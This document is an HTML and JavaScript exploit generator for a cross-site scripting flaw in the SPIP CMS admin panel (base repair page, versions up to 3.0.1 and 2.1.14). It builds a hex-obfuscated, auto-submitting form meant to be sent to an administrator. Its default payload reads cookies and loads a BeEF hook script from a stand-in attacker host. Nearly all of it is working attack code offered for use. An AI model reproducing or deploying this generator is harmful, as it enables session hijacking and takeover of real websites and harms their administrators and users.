Exploit generator: ------------------ <html> <head> <script> function trim(s){ return s.replace(/\r\n|\r|\n|\t/g,'').replace(/^\s+/g,'').replace(/\s+$/g,''); } function encodeToHex(s){ var r=""; var h; for(var c=0;c<s.length;c++){ h=s.charCodeAt(c).toString(16); while(h.length<3) h="%"+h; r+=h; } return r; } function generateXSS(){ var target = trim(document.getElementById("target").value); var version = trim(document.getElementById("version").value); var content = trim(document.getElementById("content").value); var resultjs = ""; resultjs += "<html><body><form name='x' action='" + target + "ecrire/?exec=" + version + "' method='post'>"; resultjs += "<input type='hidden' name='exec' value='" + version + "' />"; resultjs += "<input type='hidden' name=\"x'><script>eval(unescape('" + encodeToHex(content) + "'));<\/script><input=\" value='' />"; resultjs += "</form><script>document.forms['x'].submit();<\/script></body></html>"; document.getElementById("resultjs").value = resultjs; } </script> </head> <body onload="generateXSS();"> <h2>XSS in SPIP Core <=3.0.1 or <=2.1.14 admin panel (base repair)</h2> <p> This XSS, non-persistent, use POST vars through admin panel.<br /> The target is the attribute "name" of an input markup hidden.<br /> This XSS work on Firefox 13, IE7, but doesn't work on Chrome.<br /> Magic_quote_gcp = Off needed. </p> <form action="" onsubmit="generateXSS();return false;"> <table> <tr> <td>URL's SPIP Targeted :</td> <td><input id="target" type="text" value="http://target/spip/" size="70" onkeyup="generateXSS();" /></td> </tr> <tr> <td>SPIP version :</td> <td> <select id="version" onchange="generateXSS();"> <option value="base_repair">3.0.X (up to 3.0.1 included)</option> <option value="admin_repair">2.1.X (up to 2.1.14 included)</option> </select> </td> </tr> <tr> <td>JavaScript code to execute :<br />(without <script> & </script> markup)</td> <td> <textarea cols="70" rows="10" id="content" onkeyup="generateXSS();"> alert(document.cookie); var script = document.createElement("script"); script.type = "text/javascript"; script.src = "http://ha.ck.er.xxx/beEf.js"; document.body.appendChild(script); </textarea> </td> </tr> <tr> <td>Exploit to send to an admin : </td> <td> <textarea cols="70" rows="10" id="resultjs" readonly="readonly"></textarea> </td> </tr> </table> </form> </body> </html>